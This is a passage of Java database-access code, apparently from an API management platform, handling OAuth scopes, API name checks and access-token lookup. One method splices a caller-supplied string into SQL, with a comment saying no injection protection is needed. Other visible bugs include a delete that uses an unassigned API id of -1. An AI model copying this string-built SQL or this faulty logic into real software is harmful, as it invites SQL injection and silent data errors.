scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { scope.setId(rs.getInt(1)); } String roles = scope.getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, scope.getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, scope.getId()); ps2.execute(); conn.commit(); } } } } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes Creation", e1); } handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); APIMgtDBUtil.closeAllConnections(ps2, null, null); } } /** * Check a given scope key already exist for a tenant * * @param scopeKey Scope Key * @param tenantId Tenant ID * @return true if scope already exists * @throws APIManagementException if an error occurs while executing db query */ private boolean isScopeExists(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { if (log.isDebugEnabled()) { log.debug("Scope key " + scopeKey + " for tenant " + tenantId + " exists."); } return true; } } catch (SQLException e) { handleException("Failed to check scope exists for scope " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } public Set<Scope> getAPIScopes(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); int apiId; try { conn = APIMgtDBUtil.getConnection(); apiId = 
getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_API_SCOPES_SQL; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_API_SCOPES_ORACLE_SQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public void addScopes(Connection conn, Set<?> objects, int api_id, int tenantID) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; List<Integer> scopeIds = new ArrayList<Integer>(); String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; try { String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.setString(5, uriTemplate.getScope().getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); uriTemplate.getScope().setId(scopeIdValue); scopeIds.add(scopeIdValue); } } else if (object instanceof Scope) { Scope scope = (Scope) object; ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.setString(5, scope.getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); scope.setId(scopeIdValue); scopeIds.add(scopeIdValue); } } } addScopeLinks(conn, scopeIds, api_id); } } catch (SQLException e) { handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } private void addScopeLinks(Connection connection, List<Integer> scopeIds, int apiId) throws APIManagementException { String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; PreparedStatement ps = null; try { if (scopeIds != null) { ps = connection.prepareStatement(scopeLink); for (Integer scopeId : scopeIds) { ps.setInt(1, apiId); ps.setInt(2, scopeId); ps.addBatch(); } ps.executeBatch(); } } catch (SQLException e) { handleException("Error occurred while creating scope links ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Generate Set<Scope> from HashMap * * @return Set of Scopes populated with roles. 
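 * @param scopeHashMap scopes collected by the caller, keyed by scope id or scope key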
*/ private Set<Scope> populateScopeSet(HashMap<?, Scope> scopeHashMap) { Set<Scope> scopes = new LinkedHashSet<Scope>(); for (Scope scope : scopeHashMap.values()) { scopes.add(scope); } return scopes; } /** * Returns all the scopes assigned for given apis * * @param apiIdsString list of api ids separated by commas * @return Map<String, Set<Scope>> set of scopes for each apiId * @throws APIManagementException */ public Map<String, Set<Scope>> getScopesForAPIS(String apiIdsString) throws APIManagementException { ResultSet resultSet = null; PreparedStatement ps = null; Map<String, Set<Scope>> apiScopeSet = new HashMap<String, Set<Scope>>(); try (Connection conn = APIMgtDBUtil.getConnection()) { String sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST_ORACLE; } // apids are retrieved from the db so no need to protect for sql injection sqlQuery = sqlQuery.replace("$paramList", apiIdsString); ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { String apiId = resultSet.getString(1); Scope scope = new Scope(); scope.setId(resultSet.getInt(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); Set<Scope> scopeList = apiScopeSet.get(apiId); if (scopeList == null) { scopeList = new LinkedHashSet<Scope>(); scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } else { scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } return apiScopeSet; } public Set<Scope> getScopesBySubscribedAPIs(List<APIIdentifier> identifiers) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> apiIds = new ArrayList<Integer>(); HashMap<String, Scope> scopeHashMap = new HashMap<>(); try { conn = APIMgtDBUtil.getConnection(); for (APIIdentifier identifier : identifiers) { apiIds.add(getAPIID(identifier, conn)); } String commaSeparatedIds = StringUtils.join(apiIds.iterator(), ','); String sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_API_PREFIX + commaSeparatedIds + SQLConstants .GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_ORACLE_SQL + commaSeparatedIds + SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; } ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; String scopeKey = resultSet.getString(1); if (scopeHashMap.containsKey(scopeKey)) { // scope already exists append roles. 
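// (a scope bound to several roles arrives as several rows, so only the additional role is appended to the scope collected earlier)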
scope = scopeHashMap.get(scopeKey); String roles = scope.getRoles(); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(scope.getRoles().concat("," + resultSet.getString(4)).trim()); } } else { scope = new Scope(); scope.setKey(scopeKey); scope.setName(resultSet.getString(2)); scope.setDescription(resultSet.getString(3)); String roles = resultSet.getString(4); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(resultSet.getString(4).trim()); } } scopeHashMap.put(scopeKey, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getAPIScopesByScopeKey(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); try { String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEY_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getScopesByScopeKeys(String scopeKeys, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> inputScopeList = Arrays.asList(scopeKeys.split(" ")); StringBuilder placeHolderBuilder = new StringBuilder(); HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); for (int i = 0; i < inputScopeList.size(); i++) { placeHolderBuilder.append("?, "); } String placeHolderStr = placeHolderBuilder.deleteCharAt(placeHolderBuilder.length() - 2).toString(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX + placeHolderStr + SQLConstants .GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX_ORACLE + placeHolderStr + SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; } ps = conn.prepareStatement(sqlQuery); for (int i = 0; i < inputScopeList.size(); i++) { ps.setString(i + 1, inputScopeList.get(i)); } ps.setInt(inputScopeList.size() + 1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. 
scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(6)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(6).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateScopes(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId = -1; String deleteResourceScopes = SQLConstants.REMOVE_RESOURCE_SCOPE_SQL; String deleteScopes = SQLConstants.REMOVE_SCOPE_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteResourceScopes); prepStmt.setInt(1, apiId); prepStmt.execute(); prepStmt = connection.prepareStatement(deleteScopes); prepStmt.setInt(1, apiId); prepStmt.execute(); connection.commit(); } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes updating", e1); } handleException("Error while updating Scopes for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } addScopes(api.getUriTemplates(), api.getId(), apiId, tenantId); } public HashMap<String, String> getResourceToScopeMapping(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<String, String> map = new HashMap<String, String>(); int apiId; try { String sqlQuery = SQLConstants.GET_RESOURCE_TO_SCOPE_MAPPING_SQL; apiId = getAPIID(identifier, conn); conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getString(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } public Map<String, String> getScopeRolesOfApplication(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPE_ROLES_OF_APPLICATION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); Map<String, String> scopes = new HashMap<String, String>(); while (resultSet.next()) { if (scopes.containsKey(resultSet.getString(1))) { // Role for the scope exists. Append the new role. 
String roles = scopes.get(resultSet.getString(1)); roles += "," + resultSet.getString(2); scopes.put(resultSet.getString(1), roles); } else { scopes.put(resultSet.getString(1), resultSet.getString(2)); } } return scopes; } catch (SQLException e) { handleException("Failed to retrieve scopes of application" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * Remove scope entries from DB, when delete APIs * * @param apiIdentifier The {@link APIIdentifier} of the API */ private void removeAPIScope(APIIdentifier apiIdentifier) throws APIManagementException { Set<Scope> scopes = getAPIScopes(apiIdentifier); Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement deleteOauth2ResourceScopePrepStmt = null; PreparedStatement deleteOauth2ScopePrepStmt = null; int scopeId; int apiId = -1; String deleteAPIScopeQuery = SQLConstants.REMOVE_FROM_API_SCOPES_SQL; String deleteOauth2ScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_SCOPE_SQL; String deleteOauth2ResourceScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_RESOURCE_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteAPIScopeQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); if (!scopes.isEmpty()) { deleteOauth2ResourceScopePrepStmt = connection.prepareStatement(deleteOauth2ResourceScopeQuery); deleteOauth2ScopePrepStmt = connection.prepareStatement(deleteOauth2ScopeQuery); for (Scope scope : scopes) { scopeId = scope.getId(); deleteOauth2ResourceScopePrepStmt.setInt(1, scopeId); deleteOauth2ResourceScopePrepStmt.addBatch(); deleteOauth2ScopePrepStmt.setInt(1, scopeId); deleteOauth2ScopePrepStmt.addBatch(); } deleteOauth2ResourceScopePrepStmt.executeBatch(); deleteOauth2ScopePrepStmt.executeBatch(); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the scopes for the API: " + apiIdentifier.getApiName() + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(deleteOauth2ResourceScopePrepStmt, null, null); APIMgtDBUtil.closeAllConnections(deleteOauth2ScopePrepStmt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Delete a user subscription based on API_ID, APP_ID, TIER_ID * * @param apiId - subscriber API ID * @param appId - application ID used to subscribe * @throws java.sql.SQLException - Letting the caller to handle the roll back */ private void deleteSubscriptionByApiIDAndAppID(int apiId, int appId, Connection conn) throws SQLException { String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_SQL; PreparedStatement ps = null; try { ps = conn.prepareStatement(deleteQuery); ps.setInt(1, apiId); ps.setInt(2, appId); ps.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Delete subscription based on API_PRODUCT_ID, APP_ID * * @param apiProductId - subscriber API_PRODUCT_ID * @param appId - application ID used to subscribe * @throws java.sql.SQLException - Letting the caller to handle the roll back */ private void deleteSubscriptionByApiProductIDAndAppID(int apiProductId, int appId, Connection conn) throws SQLException { String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_AND_PRODUCT_SQL; PreparedStatement ps = null; try { ps = conn.prepareStatement(deleteQuery); ps.setInt(1, apiProductId); ps.setInt(2, appId); ps.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Check the given api name is already 
available in the api table under given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if the name is already available * @throws APIManagementException */ public boolean isApiNameExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check api Name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether another API with a different letter case of the given api name is already available in the api * table under the given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if a different letter case name is already available * @throws APIManagementException If failed to check different letter case api name availability */ public boolean isApiNameWithDifferentCaseExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_DIFF_CASE_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_DIFF_CASE_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); prepStmt.setString(3, apiName); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check different letter case api name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public Set<String> getActiveTokensOfConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKEN_OF_CONSUMER_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens for consumerKey " + consumerKey, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of consumerKey " + consumerKey, e); } finally { 
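// closeAllConnections is called with null arguments elsewhere in this class, so this cleanup is safe even if the statement or result set was never created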
APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } /** * Check the given scope key is already available under given tenant * * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException */ public boolean isScopeKeyExist(String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String query = SQLConstants.GET_SCOPE_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); int scopeCount = 0; if (resultSet != null) { while (resultSet.next()) { scopeCount = resultSet.getInt("SCOPE_COUNT"); } } if (scopeCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether the given scope key is already assigned to another API than given under given tenant * * @param identifier API Identifier * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException if failed to check the context availability */ public boolean isScopeKeyAssigned(APIIdentifier identifier, String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement prepStmt2 = null; ResultSet resultSet = null; ResultSet resultSet2 = null; String apiScopeQuery = SQLConstants.GET_API_SCOPE_SQL; String getApiQuery = SQLConstants.GET_API_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(apiScopeQuery); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); if (resultSet != null && resultSet.next()) { int apiID = resultSet.getInt("API_ID"); String provider = resultSet.getString("API_PROVIDER"); String apiName = resultSet.getString("API_NAME"); prepStmt2 = connection.prepareStatement(getApiQuery); prepStmt2.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt2.setString(2, identifier.getApiName()); prepStmt2.setString(3, identifier.getVersion()); resultSet2 = prepStmt2.executeQuery(); if (resultSet2 != null && resultSet2.next()) { //If the API ID is different from the one being saved if (apiID != resultSet2.getInt("API_ID")) { //Check if the provider name and api name is same. if (provider.equals(APIUtil.replaceEmailDomainBack(identifier.getProviderName())) && apiName .equals(identifier.getApiName())) { //Return false since this means we're attaching the scope to another version of the API. 
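// (reusing a scope across versions of the same API is allowed; only use by a different API counts as already assigned)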
return false; } return true; } else { return false; } } } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt2, null, resultSet2); APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public boolean isDuplicateContextTemplate(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_CONTEXT_TEMPLATE_COUNT_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); if (resultSet.next()) { int count = resultSet.getInt("CTX_COUNT"); return count > 0; } } catch (SQLException e) { handleException("Failed to count contexts which match " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * retrieve list of API names which matches given context * * @param contextTemplate context template * @return list of API names * @throws APIManagementException */ public List<String> getAPINamesMatchingContext(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> nameList = new ArrayList<String>(); String sqlQuery = SQLConstants.GET_API_NAMES_MATCHES_CONTEXT; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); while (resultSet.next()) { nameList.add(resultSet.getString("API_NAME")); } } catch (SQLException e) { handleException("Failed to get API names matches context " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return nameList; } /** * @param consumerKey * @return */ public boolean isMappingExistsforConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_APPLICATION_MAPPING_FOR_CONSUMER_KEY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); // We only expect one result. 
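// A consumer key maps to at most one application, so a single row, if present, is enough to decide.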
if (resultSet.next()) { String applicationId = resultSet.getString("APPLICATION_ID"); return (applicationId != null && !applicationId.isEmpty()); } } catch (SQLException e) { handleException("Failed to get Application ID by consumerKey ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * @param applicationId * @param keyType * @return */ public String getConsumerkeyByApplicationIdAndKeyType(String applicationId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String consumerKey = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_CONSUMER_KEY_BY_APPLICATION_AND_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { consumerKey = resultSet.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Failed to get consumer key by applicationId " + applicationId + "and keyType " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return consumerKey; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public String getLastPublishedAPIVersionFromAPIStore(APIIdentifier apiIdentifier, String storeName) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Connection conn = null; String version = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_LAST_PUBLISHED_API_VERSION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiIdentifier.getProviderName()); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, storeName); rs = ps.executeQuery(); while (rs.next()) { version = rs.getString("API_VERSION"); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return version; } private String getScopeString(List<String> scopes) { return StringUtils.join(scopes, " "); } /** * Find all active access tokens of a given user. * * @param username - Username of the user * @return - The set of active access tokens of the user. */ public Set<String> getActiveAccessTokensOfUser(String username) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); int tenantId = IdentityTenantUtil.getTenantIdOfUser(username); String userStoreDomain = IdentityUtil.extractDomainFromName(username).toUpperCase(); if (StringUtils.isEmpty(userStoreDomain)) { userStoreDomain = IdentityUtil.getPrimaryDomainName(); } else { //IdentityUtil doesn't have a function to remove the domain name from the username. Using the UserCoreUtil. 
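// The user store domain extracted above is bound separately as a query parameter, so only the bare username is kept here.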
username = UserCoreUtil.removeDomainFromName(username); } try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKENS_OF_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACTIVE_TOKENS_OF_USER_SUFFIX; ps = conn.prepareStatement(sqlQuery); ps.setString(1, MultitenantUtils.getTenantAwareUsername(username)); ps.setInt(2, tenantId); ps.setString(3, userStoreDomain.toLowerCase()); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens of user " + username, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of user " + username, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } // public TokenGenerator getTokenGenerator() { // return tokenGenerator; // } private String getAccessTokenStoreTableNameOfUserId(String userId, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromUserId(userId); } return accessTokenStoreTable; } private String getAccessTokenStoreTableFromAccessToken(String accessToken, String accessTokenStoreTable) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { return APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); } return accessTokenStoreTable; } /** * This method will fetch all alerts type that is available in AM_ALERT_TYPES. * * @param stakeHolder the name of the stakeholder. whether its "subscriber", "publisher" or * "admin-dashboard" * @return List of alert types * @throws APIManagementException */ public HashMap<Integer, String> getAllAlertTypesByStakeHolder(String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, String> map = new HashMap<Integer, String>(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery; if (stakeHolder.equals("admin-dashboard")) { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES_FOR_ADMIN; ps = conn.prepareStatement(sqlQuery); } else { sqlQuery = SQLConstants.GET_ALL_ALERT_TYPES; ps = conn.prepareStatement(sqlQuery); ps.setString(1, stakeHolder); } resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getInt(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve alert types ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } /** * @param userName user name with tenant domain ex: [email protected] * @param stakeHolder value "p" for publisher value "s" for subscriber value "a" for admin * @return map of saved values of alert types. 
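 *         (the saved alert type ids are returned as a {@code List<Integer>})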
